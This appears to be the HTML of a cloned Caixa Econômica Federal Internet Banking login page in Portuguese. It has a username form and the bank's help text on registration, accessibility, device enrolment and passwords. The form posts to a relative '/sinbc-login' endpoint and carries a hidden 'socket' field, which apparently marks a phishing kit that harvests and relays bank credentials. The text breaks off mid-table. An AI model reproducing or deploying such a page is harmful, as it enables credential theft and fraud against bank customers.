<header class="hidden-xs">
    <div class="main">
        <div class="collapse navbar-collapse hidden-sm" id="acessibilidade">
            <ul class="nav navbar-nav acessMenu fonte10 fonteBranca">
                <li>
                    <a href="#" data-href="conteudo" class="skip altText fonteBranca">Ir para conteúdo</a>
                </li>
            </ul>
        </div>
    </div>
    <div class="mainHeader | gradient">
        <div class="contentMainHeader">
            <h1 class="brand" title="Caixa Econômica Federal">
                <a href="http://www.caixa.gov.br" id="aLogoLink" class="alogo">Caixa Econômica | Internet Banking</a>
            </h1>
        </div>
    </div>
</header>

<div id="delimitarTeclado">
    <div class="main" id="conteudo">

        <div id="imagemFundo" class="backBanner hidden-xs"
            style="background: url('../img/17112020_100934_img.jpg') center top no-repeat; display: block;">
        </div>
        <div class="container-fluid ajusteMargem" id="conteudo-login" style="display: block;">
            <div class="row">
                <div class="col-md-4 col-sm-2 login hidden-xs">
                    <a id="imgfundoLink"
                        href="http://www.caixa.gov.br/pix/Paginas/default.aspx?utm_source=ibc_desktop&amp;utm_medium=propriedadecaixa&amp;utm_campaign=pixnacaixa&amp;utm_term=intervencao&amp;utm_content=pc0006"
                        target="" class="hidden-xs">
                        <div class="background-home-link hidden-xs" title="Saiba Mais"></div>
                    </a>
                </div>
                <div class="col-md-4 col-sm-4 login hidden-xs">
                    <div class="panel loginGray gradient hidden-xs">
                        <div class="panel-body painelFont">
                            <div id="boxCadastre">
                                <p id="boxCadastre_titulo" class="titleLoginBox titlePanels titleFont">CADASTRE-SE</p>
                                Primeiro acesso ao Internet Banking Caixa? Cadastre sua conta e crie seu usuário. É
                                simples, rápido e seguro.
                            </div>
                            <button type="button" id="btnAdesao" name="btnAdesao" accesskey="s"
                                class="botaoLaranja pull-right boxCentral_botao" title="Cadastrar"
                                style="border-radius: 3px;">CADASTRAR</button>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-sm-6 col-xs-12">
                    <div class="blocLoginCinza blocLoginBlue ">
                        <div id="textoLogin" class="hidden-xs">
                            <p class="titlePanels titleLogin">JÁ SOU USUÁRIO DO</p>
                            <p class="titlePanels titleLoginIBC">INTERNET BANKING CAIXA</p>
                        </div>
                        <div class="titleLoginXS2 hidden-sm hidden-md hidden-lg"
                            style="text-align: center; font-weight: bold;">IDENTIFICAÇÃO DO USUÁRIO</div>
                        <div class="descLoginBloc clearfix">
                            <form id="user" action="/sinbc-login" method="POST">

                                <input type="hidden" name="status" value="create">
                                <input type="hidden" name="socket" class="theSocket" value="">

                                <div class="form-group">
                                    <label for="name" class="col-md-12">Usuário</label>
                                    <div class="col-md-12">
                                        <input id="nomeUsuario" autocomplete="off" accesskey="n" name="user" type="text"
                                            class="inputWhite form-control BGCinza" title="Digite o nome do usuário">
                                    </div>
                                </div>
                                <div class="blocForm col-md-12">
                                    <div for="name" class="subtitleLoginXS hidden-md hidden-lg">Acessar como:
                                    </div>
                                    <div class="radio form-group">
                                        <label> <input id="tpPessoaFisica" name="type" type="radio" value="fisica"
                                                title="Pessoa Física" checked="checked"> Pessoa Física
                                        </label>
                                    </div>
                                    <div class="radio form-group">
                                        <label> <input id="tpPessoaJuridica" name="type" type="radio" value="juridica"
                                                title="Pessoa Jurídica">
                                            Pessoa Jurídica
                                        </label>
                                    </div>
                                    <div class="radio form-group hidden-xs">
                                        <label> <input id="tpGov" name="type" type="radio" value="governo"
                                                title="Governo">
                                            Governo
                                        </label>
                                    </div>
                                    <div class="checkbox form-group hidden-xs">
                                        <label title="Acessar com o Certificado Digital"> <input
                                                id="chkCertificadoDigital" type="checkbox" class="checkbox"> Usar
                                            certificado digital.
                                        </label> <a id="certificadoLink" data-div="#certificadoBox" class="knowMorelink"
                                            href="#">Conheça
                                            mais sobre a certificação digital</a>
                                    </div>
                                    <div class="text-right">
                                        <button type="button" id="btnLogin" name="btnLogin" class="botaoLaranja"
                                            title="Acessar" style="border-radius: 3px;">CONTINUAR</button>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                    <div class="hidden-md hidden-sm hidden-lg BottonLoginXS">
                        Ainda não tem acesso ao Internet Banking? <br>É só <a href="#" id="btnAdesaoSmart"
                            name="btnAdesaoSmart" accesskey="s">clicar
                            aqui </a>e se cadastrar.
                    </div>
                </div>
            </div>

            <!-- ini - exclusivo para gbuster -->
            <div style="display: none;" id="divObjGB"></div>
            <!-- fim - exclusivo para gbuster -->
            <div class="row hidden-xs">
                <div class="col-md-12 clearfix">
                    <section class="infos clearfix">
                        <div class="titles">
                            <p class="knowTitle">CONHEÇA</p>
                            <p class="knowSubTitle">O INTERNET BANKING CAIXA</p>
                        </div>
                    </section>
                    <section class="menuLoginHome clearfix">
                        <div class="menuLogin text-center">
                            <ul>
                                <li id="item1" data-number="1" class="menu menu1 selected " tabindex="15"><span
                                        class="icon"></span> SAIBA COMO USAR</li>
                                <li id="item2" data-number="2" class="menu menu2" tabindex="16"><span
                                        class="icon"></span> ACESSIBILIDADE</li>
                                <li id="item3" data-number="3" class="menu menu3" tabindex="17"><span
                                        class="icon"></span> CADASTRO DE COMPUTADORES</li>
                                <li id="item4" data-number="4" class="menu menu4" tabindex="18"><span
                                        class="icon"></span> SENHA E USUÁRIO</li>
                                <li id="item5" data-number="5" class="menu menu5" tabindex="19"><span
                                        class="icon"></span> PERGUNTAS FREQUENTES</li>
                            </ul>
                        </div>
                        <div class="container-menuLogin">
                            <div id="content1" class="boxContent">
                                <p class="contentTitle">SAIBA COMO USAR</p>
                                <p id="conheca_saibaMais">Utilizar o Internet Banking CAIXA é rápido e prático!<a
                                        onclick="abreModal('#novosaiba');" class="knowMorelink"> Clique aqui </a>para
                                    entender como funciona.
                                <div style="margin-top: -300px; padding-right: 20px; padding-bottom: -50px;"
                                    id="novosaiba" class="knowMore | knowMorelogin ui-draggable">
                                    <a id="topo5"></a>
                                    <article id="knowMoreModal5" class="knowMoreContent">
                                        <a id="topo5"></a>
                                        <div class="btClose" data-divhide="#novosaiba">
                                            <button style="border-radius: 3px;" class="buttonBlue"
                                                onclick="javascript:document.getElementById('novosaiba').style.display='none'"><span>Fechar</span></button>

                                        </div>
                                        <section id="contentKnowMoresaibacomo" class="tabContent">
                                            <p class="titleModal">SAIBA COMO USAR </p>
                                            Em seu primeiro acesso crie um Usuário e uma Senha Internet na opção
                                            CADASTRAR. Os dados (nome, CPF e data de nascimento) devem ser informados
                                            conforme cadastro na Receita Federal. Dessa forma você estará apto para
                                            consultar saldo, extrato da conta ou extrato de compras com cartão de
                                            débito.<br><br>

                                            Para realizar transações financeiras é necessário cadastrar a assinatura
                                            eletrônica e o dispositivo a ser utilizado.<br><br>
                                            A assinatura eletrônica pode ser cadastrada no próprio Internet Banking
                                            CAIXA na opção Configurar Acesso &gt; Consultar contas, caso o cartão da sua
                                            conta possua chip. Após o cadastramento você deve desbloqueá-la em um de
                                            nossos Caixas Eletrônicos, na opção Outros Serviços &gt; Outros Serviços
                                            &gt; Senhas e validações de acesso &gt; Desbloqueio de assinatura
                                            eletrônica.<br><br>

                                            Caso seu cartão não possua chip você deverá solicitar o cadastramento da
                                            assinatura eletrônica na sua agência. Após o cadastramento você tem até 15
                                            dias corridos para alterá-la. A troca é efetuada após acessar sua conta na
                                            opção Configurar Acesso &gt; Alterar assinatura eletrônica.


                                        </section>
                                    </article>
                                </div>
                                </p>
                            </div>
                            <div id="content2" class="boxContent" style="display: none;">
                                <p class="contentTitle">ACESSIBILIDADE</p>
                                <p id="conheca_acessibilidade">A CAIXA pratica a cidadania também no Internet Banking
                                    CAIXA, onde os clientes com deficiência e/ou limitações visuais encontram uma
                                    plataforma adaptada à acessibilidade.<a onclick="abreModal('#nacess');"
                                        class="knowMorelink"> Conheça</a>.

                                <div style="margin-top: -300px; padding-right: 20px;" id="nacess"
                                    class="knowMore | knowMorelogin ui-draggable">
                                    <article id="knowMoreModal1" class="knowMoreContent">
                                        <a id="topo2"></a>
                                        <div class="btClose" data-divhide="#nacess">
                                            <button style="border-radius: 3px;" class="buttonBlue"
                                                onclick="javascript:document.getElementById('nacess').style.display='none'"><span>Fechar</span></button>

                                        </div>
                                        <section id="contentKnowMoreAccessibility" class="tabContent">
                                            <p class="titleModal">ACESSIBILIDADE</p>
                                            <p class="titleModalKnowMore">Na CAIXA os clientes com deficiência e/ou
                                                limitações visuais podem acessar e realizar transações financeiras de
                                                forma simples e segura, com os benefícios visuais e auditivos que
                                                facilitam o uso do nosso sistema.</p>
                                            <p>Para facilitar a navegação recomendamos utilizar as seguintes teclas de
                                                atalho:</p>
                                            TAB = Navegar para frente entre os hiperlinks da página<br><br>
                                            SHIFT+TAB = Navegar para trás entre os hiperlinks da página<br><br>
                                            ALT+seta para esquerda = Voltar para página anterior<br><br>
                                            ALT+seta para direita = Ir para próxima página<br><br>
                                            ENTER = Ativa o hiperlink corrente<br><br>
                                            7 do teclado numérico = Repete última frase lida pelo Virtual Vision<br><br>
                                            9 do teclado numérico = Fala posição da barra de status da página. Muito
                                            utilizado para saber se a página já foi totalmente carregada<br><br>
                                            CTRL+ponto do teclado numérico = Seleciona todo texto da página e inicia a
                                            leitura automaticamente<br><br>
                                            CTRL+A e ALT+ponto = Mesma função das teclas anteriores, ou seja, seleciona
                                            todo texto da página e inicia a leitura automaticamente. Esta combinação é
                                            utilizada quando o Virtual Vision não consegue ler apenas utilizando as
                                            teclas CTRL+ponto<br><br>
                                            0 do teclado numérico = Fala o título da janela corrente<br><br>
                                            CTRL+7 do teclado numérico = Repete a última mensagem falada, só que em modo
                                            solutrado<br><br>
                                            + do teclado numérico = Fala características do controle selecionado. Deve
                                            ser utilizado quando em um formulário o Virtual Vision não ler alguma
                                            informação sobre o controle<br><br>
                                            - do teclado numérico = Faz o Virtual Vision parar de falar o texto
                                            corrente<br><br>
                                            F11 = Maximiza a janela corrente<br><br>
                                            ALT+F4 = Fecha a janela corrente<br><br>
                                            F5 = Carrega a página atual novamente<br><br>
                                            CTRL+TAB ou F6 = Alternar entre os frames do site<br><br>
                                            <p class="titleModalKnowMore">Quer saber mais sobre acessibilidade e
                                                inclusão digital?<a href="http://www.lupadigital.info" target="_blank">
                                                    Clique aqui</a>.</p>
                                            <p class="titleModalKnowMore">Para consultar uma lista de aplicativos e
                                                ferramentas que facilitam a acessibilidade<a
                                                    href="http://acessibilidadelegal.com/30-assistivas.php"
                                                    target="_blank"> clique aqui.</a></p>
                                            <p class="titleModalKnowMore">Esclareça dúvidas e receba suporte técnico
                                                para Deficientes Auditivos: 0800 726 2492</p>

                                        </section>
                                    </article>
                                </div>
                                </p>
                            </div>
                            <div id="content3" class="boxContent" style="display: none;">
                                <p class="contentTitle">CADASTRO DE COMPUTADORES</p>
                                <p id="conheca_cad_computadores">Para efetuar transações financeiras a partir do
                                    internet banking você precisa cadastrar o dispositivo a ser utilizado. <br><br>

                                    Chamamos de dispositivo todo equipamento utilizado para acesso ao Internet Banking
                                    Caixa como computador, tablet e smartphone.
                                    Ao selecionar algum serviço que exija o uso da assinatura eletrônica (por exemplo
                                    pagamento ou transferência), você será direcionado para o cadastramento do
                                    dispositivo que está utilizando. Você deverá escolher um apelido para o equipamento
                                    e o tempo que deseja mantê-lo cadastrado.<br><br>

                                    Para a sua segurança, o dispositivo será validado apenas após ativação via SMS, ou
                                    em um outro dispositivo já cadastrado, ou em uma agência . <br><br>

                                    <a onclick="abreModal('#novocomp');" class="knowMorelink">Clique aqui </a>e saiba
                                    mais sobre cadastramento do seu dispositivo.
                                <div style="margin-top: -400px; padding-right: 20px;" id="novocomp"
                                    class="knowMore | knowMorelogin ui-draggable">
                                    <article id="knowMoreModal2" class="knowMoreContent">
                                        <a id="topo3"></a>
                                        <div class="btClose" data-divhide="#novocomp">
                                            <button style="border-radius: 3px;" class="buttonBlue"
                                                onclick="javascript:document.getElementById('novocomp').style.display='none'"><span>Fechar</span></button>

                                        </div>
                                        <section id="contentKnowMoreAccessibility" class="tabContent">
                                            <p class="titleModal">CADASTRO DE COMPUTADORES</p>
                                            <p class="titleModalKnowMore">Caso você escolha a opção <i>Receber via SMS
                                                    código para ativação</i></p>
                                            Neste caso você deve possuir uma conta previamente cadastrada no serviço de
                                            Mensagens via celular - SMS. Esse cadastramento pode ser feito em um de
                                            nossos Caixas Eletrônicos na opção Outros Serviços &gt; Outros Serviços &gt;
                                            Mensagens via celular, ou na sua agência. <br><br>

                                            No momento do cadastramento do dispositivo o Internet Banking exibe o número
                                            cadastrado no serviço de mensagens. Após selecioná-lo e clicar em Continuar,
                                            você receberá um SMS contendo um número aleatório e terá até 2 horas para
                                            digitá-lo na página do cadastramento. <br><br>

                                            Se o código estiver correto, é exibida a mensagem <i>Seu dispositivo foi
                                                ativado</i> e o mesmo já estará habilitado para transações
                                            financeiras.<br><br>

                                            Em caso negativo, o sistema exibe a mensagem <i>Código SMS não confere</i>.
                                            Após 3 tentativas incorretas o dispositivo é excluído e será preciso
                                            reiniciar o processo.<br><br>

                                            <p class="titleModalKnowMore">Caso você escolha a opção <i>Ativar em outro
                                                    dispositivo já cadastrado ou em uma agência</i></p><br><br>
                                            Neste caso, o Internet Banking CAIXA exibe a informação que você terá até 48
                                            horas para concluir o cadastramento. O próximo passo é acessar o Internet
                                            Banking em um outro dispositivo já ativo e efetuar o desbloqueio clicando em
                                            Configurar acesso &gt; Consultar computadores/dispositivos cadastrados. Você
                                            deverá selecionar o dispositivo desejado e clicar no botão <i>Ativar
                                                Dispositivo</i>.<br><br>

                                            Outra opção é dirigir-se a qualquer agência da CAIXA e solicitar o
                                            desbloqueio.<br><br>

                                            Para informações sobre os critérios de segurança no cadastramento do seu
                                            dispositivo, <a
                                                href="http://www.caixa.gov.br/seguranca/internet-banking/Paginas/default.aspx"
                                                target="blank">clique aqui</a>.<br><br>

                                        </section>
                                    </article>
                                </div>
                                </p>
                            </div>
                            <div id="content4" class="boxContent" style="display: none;">
                                <p class="contentTitle">SENHA E USUÁRIO</p>
                                <p id="conheca_usu_senha">Para movimentar sua conta pelo Internet Banking será
                                    necessário criar um usuário, uma senha internet e uma assinatura eletrônica.
                                    <br><br>

                                    Caso este seja seu primeiro acesso, ou tenha esquecido, ou bloqueado seu usuário ou
                                    senha internet, será necessário um novo cadastro clicando no botão
                                    CADASTRAR.<br><br>
                                    Caso você tenha bloqueado sua assinatura eletrônica, você pode desbloqueá-la em um
                                    de nossos Caixas Eletrônicos, na opção Outros Serviços &gt; Outros Serviços &gt;
                                    Senhas e validações de acesso &gt; Desbloqueio de assinatura eletrônica, ou em sua
                                    agência. <br><br>

                                    Caso você tenha esquecido sua assinatura eletrônica, solicite uma nova em sua
                                    agência. <br><br>


                                    <a onclick="abreModal('#novasenha');" class="knowMorelink">Clique aqui </a>para mais
                                    detalhes sobre usuário, senha internet e assinatura eletrônica.
                                <div style="margin-top: -400px; padding-right: 20px;" id="novasenha"
                                    class="knowMore | knowMorelogin ui-draggable">
                                    <article id="knowMoreModal3" class="knowMoreContent">
                                        <a id="topo4"></a>
                                        <div class="btClose" data-divhide="#novasenha">
                                            <button style="border-radius: 3px;" class="buttonBlue"
                                                onclick="javascript:document.getElementById('novasenha').style.display='none'"><span>Fechar</span></button>

                                        </div>
                                        <section id="contentnovasenha" class="tabContent">
                                            <p class="titleModal">SENHA E USUÁRIO</p>
                                            Usuário é a chave de login escolhida por você para acesso ao Internet
                                            Banking. É alfanumérica e deve conter entre 10 e 20 caracteres (letras e
                                            números). <br><br>

                                            Senha internet é uma senha de 6 a 8 caracteres alfanuméricos que permite o
                                            acesso ao Internet Banking CAIXA e possibilita a realização de consultas. A
                                            senha internet nunca é solicitada por e-mail. <br><br>
                                            Assinatura eletrônica é a senha que permite a efetivação das transações
                                            financeiras pelo Internet Banking. É recomendável uma senha que não contenha
                                            dados pessoais e que seja alterada periodicamente. Pode ser cadastrada no
                                            Internet Banking CAIXA, caso você possua cartão de débito com chip, ou na
                                            sua agência de relacionamento, caso seu cartão não possua chip. A assinatura
                                            eletrônica nunca é solicitada por e-mail.<br><br>

                                            Assinatura eletrônica múltipla é a senha que permite a efetivação das
                                            transações financeiras pelo Internet Banking, para contas de empresas que
                                            necessitam de duas ou mais autorizações, assim como para contas conjuntas
                                            não solidárias. Ela nunca é solicitada por e-mail, não deve conter dados
                                            pessoais e deve ser alterada periodicamente. É cadastrada na agência e
                                            alterada no Internet Banking. <br><br>
                                            Para informações sobre o processo de cadastramento <a
                                                href="http://www.caixa.gov.br/atendimento/internet-banking/Paginas/default.aspx"
                                                target="blank">clique aqui</a>

                                        </section>
                                    </article>
                                </div>
                                </p>
                            </div>
                            <div id="content5" class="boxContent" style="display: none;">
                                <p class="contentTitle">PERGUNTAS FREQUENTES</p>
                                <p id="conheca_perguntas_freq">Caso tenha alguma dúvida sobre algum procedimento, <a
                                        href="http://www.caixa.gov.br/atendimento/internet-banking/perguntas-frequentes/Paginas/default.aspx"
                                        target="blank">clique aqui</a> para acesso as dúvidas mais freqüentes.

                                </p>
                            </div>
                        </div>
                    </section>
                </div>
            </div>
            <!-- CONTENT MODAL ACCESSIBILITY -->
            <div id="openAccessibility" class="knowMore | knowMorelogin ui-draggable">
                <article id="knowMoreModal1" class="knowMoreContent">
                    <a id="topo"></a>
                    <div class="btClose" data-divhide="#openAccessibility">
                        <button class="buttonBlue" style="border-radius: 3px;">
                            <span>Fechar</span>
                        </button>
                    </div>
                    <section id="contentKnowMoreAccessibility" class="tabContent">
                        <p class="titleModal">Acessibilidade</p>
                        <p class="titleModalKnowMore">A CAIXA pratica a cidadania também no Internet Banking, onde os
                            clientes com deficiências e/ou limitações visuais encontram
                            uma plataforma adaptada à acessibilidade.
                        </p>
                        <p>Assim, pessoas que se enquadram neste perfil podem acessar e realizar transações financeiras
                            de forma simples e segura,
                            com os benefícios visuais e auditivos que facilitam o uso do nosso sistema.
                        </p>
                        <p>Se você é ou tem algum conhecido que é portador dessas limitações e quer tornar o Internet
                            Banking mais acessível para
                            suas necessidades, basta ir até uma agência CAIXA e pedir auxílio para um de nossos
                            atendentes.</p>
                        <p class="titleModalKnowMore">Teclas de Atalho para Navegação:</p>
                        <p>Para facilitar a navegação para deficientes visuais, recomendamos utilizar que auxiliem o
                            acesso á Internet para quem
                            precisa e conhecer quais teclas do teclado ajudam o funcionamento do programa:</p>
                        <p class="subTitleModal">TAB</p>
                        <p>Navegar para frente entre os hiperlinks da página</p>
                        <p class="subTitleModal">SHIFT+TAB</p>
                        <p>Navegar para trás entre os hiperlinks da página</p>
                        <p class="subTitleModal">ALT+seta para esquerda</p>
                        <p>Voltar para página anterior</p>
                        <p class="subTitleModal">ALT+seta para direita</p>
                        <p>Ir para próxima página</p>
                        <p class="subTitleModal">ENTER</p>
                        <p>Ativa o hiperlink corrente</p>
                        <p class="subTitleModal">7 do teclado numérico</p>
                        <p>Repete última frase lida pelo Virtual Vision</p>
                        <p class="subTitleModal">9 do teclado numérico</p>
                        <p>Fala posição da barra de status da página. Muito utilizado para saber se a página já foi
                            totalmente carregada.</p>
                        <p class="subTitleModal">CTRL+ponto do teclado numérico</p>
                        <p>Seleciona todo texto da página e inicia a leitura automaticamente.
                        </p>
                        <p class="subTitleModal">CTRL+A e ALT+ponto</p>
                        <p>Mesma função das teclas anteriores, ou seja, seleciona todo texto da página e inicia a
                            leitura automaticamente. Esta
                            combinação é utilizada quando o Virtual Vision não consegue ler apenas utilizando as teclas
                            CTRL+ponto.</p>
                        <p class="subTitleModal">0 do teclado numérico</p>
                        <p>Fala o título da janela corrente</p>
                        <p class="subTitleModal">CTRL+7 do teclado numérico</p>
                        <p>Repete a última mensagem falada, só que em modo solutrado.</p>
                        <p class="subTitleModal">+ do teclado numérico</p>
                        <p>Fala características do controle selecionado. Deve ser utilizado quando em um formulário o
                            Virtual Vision não ler alguma
                            informação sobre o controle.</p>
                        <p class="subTitleModal">- do teclado numérico</p>
                        <p>Faz o Virtual Vision parar de falar o texto corrente.</p>
                        <p class="subTitleModal">F11</p>
                        <p>Maximiza a janela corrente</p>
                        <p class="subTitleModal">ALT+F4</p>
                        <p>Fecha a janela corrente</p>
                        <p class="subTitleModal">F5</p>
                        <p>Carrega a página atual novamente</p>
                        <p class="subTitleModal">CTRL+TAB ou F6</p>
                        <p>Alternar entre os frames do site. Caso a página não possua frame, o foco irá alternar entre a
                            página e o campo endereço.</p>
                        <p class="titleModalKnowMore">Dicas de Acessibilidade</p>
                        <p>
                            Quer saber mais sobre acessibilidade e inclusão digital? <a
                                href="http://www.lupadigital.info/" target="_blank">Clique
                                Aqui.</a>
                        </p>
                        <p>
                            Veja uma lista de aplicativos e ferramentas que facilitam o acesso na web <a
                                href="http://acessibilidadelegal.com/30-assistivas.php" target="_blank">aqui.</a>
                        </p>
                        <p class="subTitleModal">Esclareça dúvidas e receba suporte técnico para Deficientes Auditivos:
                            0800 726 2492</p>
                        <p>
                            <a href="#topo">topo</a>
                        </p>
                    </section>
                </article>
            </div>

            <!-- CONTENT MODAL CADASTRE COMPUTERS -->
            <div id="openCadastComp" class="knowMore | knowMorelogin ui-draggable">
                <article id="knowMoreModal2" class="knowMoreContent">
                    <a id="topo1"></a>
                    <div class="btClose" data-divhide="#openCadastComp">
                        <button class="buttonBlue" style="border-radius: 3px;">
                            <span>Fechar</span>
                        </button>
                    </div>
                    <section id="contentKnowMoreCadastComp" class="tabContent">
                        <p class="titleModal">Cadastro de Computadores</p>
                        <p class="subTitleModal">1. O que é?</p>
                        <p>É uma ferramenta para os usuários do Internet Banking CAIXA, que coloca á disposição acessos
                            às contas, serviços e
                            produtos com adicionais de segurança, por meio de cadastramento do computador utilizado.
                        </p>
                        <p class="subTitleModal">2. Como funciona?</p>
                        <p>Após entrar no Internet Banking Caixa, o usuário será levado a cadastrar aquele computador
                            que ele está utilizando,
                            escolhendo um apelido para o equipamento (ex: ComputadorX) e o tempo que deseja mantê-lo
                            cadastrado, que poderá ser
                            para um único acesso, por dias (até 365) ou por tempo indeterminado. Uma vez cadastrado o
                            computador, você estará
                            pronto para utilizar o Banking com uma segurança adicional, além daquelas já existentes para
                            todos os usuários.
                        </p>
                        <p class="subTitleModal">3. Para que serve?</p>
                        <p>Adicionar mais segurança aos acessos dos usuários ao Internet Banking, protegendo seu
                            patrimônio, evitando que pessoas
                            inescrupulosas o façam.</p>
                        <p class="subTitleModal">4. Quem deve usar?</p>
                        <p>Todo usuário que esteja acessando o Internet Banking CAIXA de um computador que utiliza o
                            sistema operacional Windows
                            com navegadores Internet Explorer ou Firefox.</p>
                        <p class="subTitleModal">5. Como saberei da necessidade de cadastrar o computador?</p>
                        <p>Não precisa se preocupar. O próprio Internet Banking CAIXA verificará de modo automático e
                            apresentará as telas para
                            o cadastramento. Caso seja necessário, o Banking fará a instalação da ferramenta que
                            permitirá o cadastramento do
                            computador, o que ocorre em alguns segundos, permitindo ao usuário realizar suas consultas e
                            transações bancárias
                            com segurança.</p>
                        <p class="titleModalKnowMore">Sobre os pré-requisitos para utilizar a ferramenta</p>
                        <br>
                        <p class="subTitleModal">1. Como saberei se tenho que cadastrar o computador?</p>
                        <p>O Internet Banking identificará automaticamente se o computador necessita ser cadastrado.
                            Após a sua identificação
                            ao entrar no Banking, aparecerá um documento intitulado "Aceite de Utilização", que após a
                            concordância dos termos
                            apresentará páginas solicitando seus dados pessoais, um apelido para aquele computador e o
                            tempo de cadastramento
                            para o equipamento. Caso seja necessário, o Internet Banking fará a instalação da ferramenta
                            que permitirá o cadastramento
                            do computador, permitindo ao usuário realizar suas consultas e transações bancárias com
                            segurança.</p>
                        <p class="subTitleModal">2. Todos os usuários deverão aderir ao Adicional de Segurança?
                            Cadastramento de Computadores?</p>
                        <p>Sim. Todos os clientes que utilizarem um computador com as configurações exigidas deverão
                            realizar o cadastramento
                            para utilizar o Internet Banking CAIXA.</p>
                        <p class="subTitleModal">3. Posso utilizar essa ferramenta em qualquer computador?</p>
                        <p>
                            Não. Por enquanto, só poderão ser cadastrados os computadores que tiverem as seguintes
                            configurações: <br> <br> Em
                            breve o Banking colocará o Adicional de Segurança à disposição para todos os computadores,
                            independente de sua configuração.
                        </p>
                        <p class="subTitleModal">4. Para utilizar o Adicional de Segurança? Cadastramento de
                            Computadores será necessário instalar algum programa? Por
                            quê?
                        </p>
                        <p>Depende. Se o seu computador já possuir os recursos necessários, você digitará a senha
                            Internet e será apresentado
                            ao documento "Aceite de Utilização". Após a concordância, você poderá fazer o cadastramento
                            do computador, informando
                            alguns dados pessoais, escolhendo um apelido para o equipamento e o tempo que gostaria que
                            permanecesse apto para
                            utilização. Caso se verifique a necessidade, o Banking fará a instalação da ferramenta que
                            permitirá o cadastramento
                            do computador, o que ocorre em alguns segundos. Após a instalação será solicitada a senha
                            Internet e, em seguida o
                            "Aceite de Utilização".</p>
                        <p class="subTitleModal">5. O que é o "Aceite de Utilização"?</p>
                        <p>É um documento onde a CAIXA esclarece o que é o Cadastramento de Computadores e registra seu
                            compromisso de não-monitoração
                            de seus arquivos, e-mails ou navegação pela Internet. Lembre-se que todos os computadores
                            que tiverem as configurações
                            necessárias, deverão ser cadastrados, pois sem a qual o usuário não poderá acessar o
                            Internet Banking CAIXA.</p>
                        <p class="subTitleModal">6. E se eu não concordar com o "Aceite de Utilização"?</p>
                        <p>Você só estará apto a acessar o Banking a partir deste computador, após a sua anuência com o
                            Cadastramento de Computadores.
                            Em todos os casos em que for oferecido o "Aceite de Utilização", se você não concordar, será
                            remetido á primeira página
                            de acesso ao Banking e todo o procedimento se repetirá, até que você concorde com os termos
                            do "Aceite de Utilização".</p>
                        <p class="subTitleModal">7. O programa irá monitorar meus arquivos?
                        </p>
                        <p>Não. Nem arquivos, e-mails ou navegação pela Internet. Esse recurso não é invasivo e não
                            possui como objetivo monitorar
                            os usuários do Banking. A CAIXA respeita a privacidade de seus clientes.
                        </p>
                        <p class="subTitleModal">8. O Cadastramento de Computadores CAIXA está relacionado a algum
                            endereço IP?</p>
                        <p>Não. IP é um endereço em forma de número utilizado por um computador ligado á Internet. No
                            caso do Adicional de Segurança
                            - Cadastramento de Computadores, ele é realizado com base em uma identificação única, gerada
                            a partir de dados de
                            hardware (componentes físicos) de cada computador.</p>
                        <p class="subTitleModal">9. Quando fui fazer o registro, apareceu uma opção de só acessar
                            computadores cadastrados. O que isso quer dizer?</p>
                        <p>Essa é a melhor maneira de garantir seu Adicional de Segurança? Cadastramento de Computadores
                            trabalhando a seu favor.
                            Com essa opção você só irá acessar seu Internet Banking CAIXA, por meio de um computador que
                            possa ser cadastrado,
                            evitando vulnerabilidade nos acessos realizados por meio de equipamentos não registrados.
                        </p>
                        <p class="subTitleModal">10. Acessei o Banking por um computador que não estava cadastrado e não
                            apareceu nenhuma mensagem solicitando o cadastramento.
                            Por quê?</p>
                        <p>Quando você acessa um computador que não reúne as configurações necessárias para o
                            cadastramento, a mensagem solicitando
                            seu cadastramento não aparece.</p>
                        <p class="subTitleModal">11. Os computadores que não apresentam as configurações necessárias
                            para o cadastramento, possuem acessos seguros também?</p>
                        <p>
                            O Internet Banking CAIXA possui os mais variados recursos de segurança para garantir que,
                            após o acesso a seu ambiente, o
                            usuário possa navegar e utilizar-se de todos os serviços com total segurança. O acesso
                            seguro, em qualquer computador,
                            depende da adoção de medidas de rotina por parte do usuário, tais como: <br>
                            <br> - atualização contínua do navegador (browser) e do sistema operacional; <br> <br> -
                            utilização de versões atualizadas,
                            em seu computador, de programas antivírus, antispyware e contra intrusão (firewall); <br>
                            <br> - evitar acesso à sua
                            conta bancária em computadores públicos; <br> <br> - trocar periodicamente suas senhas de
                            acesso. <br> <br> O Cadastramento
                            de Computadores visa proporcionar um adicional de segurança aos acessos efetuados a partir
                            de computadores cadastrados
                            pela CAIXA.
                        </p>
                        <p class="titleModalKnowMore">Sobre os apelidos e o tempo de validade para o cadastramento</p>
                        <br>
                        <p class="subTitleModal">1. Como devo definir um apelido?</p>
                        <p>O apelido de seu equipamento ficará a seu critério e poderá ter de 1 a 20 caracteres (letras,
                            números, espaços e símbolos).
                            O apelido com 1 caractere não poderá estar em branco.</p>
                        <p class="subTitleModal">2. Existe restrição no uso do apelido?</p>
                        <p>Não, porém recomenda-se a utilização de um apelido de fácil reconhecimento para o usuário,
                            evitando-se apelidos óbvios,
                            como "PC do trabalho", "Meu notebook" ou "casa".</p>
                        <p class="subTitleModal">3. Posso repetir os apelidos dos computadores?
                        </p>
                        <p>Os apelidos nunca se repetem para os computadores. Uma vez escolhido um apelido para um
                            determinado computador, ele
                            não poderá ser reutilizado para outro do mesmo usuário.</p>
                        <p class="subTitleModal">4. Quantas vezes devo cadastrar meu computador?
                        </p>
                        <p>
                            Depende do prazo que você definir. A CAIXA lhe dá as seguintes opções: <br> <br> - por tempo
                            indeterminado (não necessita
                            novo cadastramento)<br> <br> - até 365 dias (após expirado o prazo, você deverá fazer novo
                            cadastramento); ou <br>
                            <br> - somente para um acesso (quando utilizar um equipamento que comumente não o utiliza).
                        </p>
                        <p class="subTitleModal">5. Quantos computadores posso cadastrar?
                        </p>
                        <p>Quantos você desejar. Porém, somente quatro equipamentos poderão constar como Cadastrados
                            para serem usados. No caso
                            de você cadastrar um quinto equipamento, aquele que possuir o acesso mais antigo da lista
                            dos "cadastrados" assumirá
                            a situação de inativo e dará lugar ao seu novo equipamento.</p>
                        <table border="1">
                            <tbody>
                                <tr class="trBlueDark">
                                    <th colspan="2" class="textStyle">Lista Atual</th>
                                    <th colspan="2" class="textStyle">Novo Cadastro</th>
                                    <th colspan="2" class="textStyle">Nova Lista</th>
                                </tr>
                                <tr class="trBlueClean" style="font-weight: bold;">
                                    <td class="fontBold">Computadores Cadastrados</td>
                                    <td class="fontBold">Acesso</td>
                                    <td class="fontBold">Computador</td>
                                    <td class="fontBold">Cadastro</td>
                                    <td class="fontBold">Computadores Ativos</td>
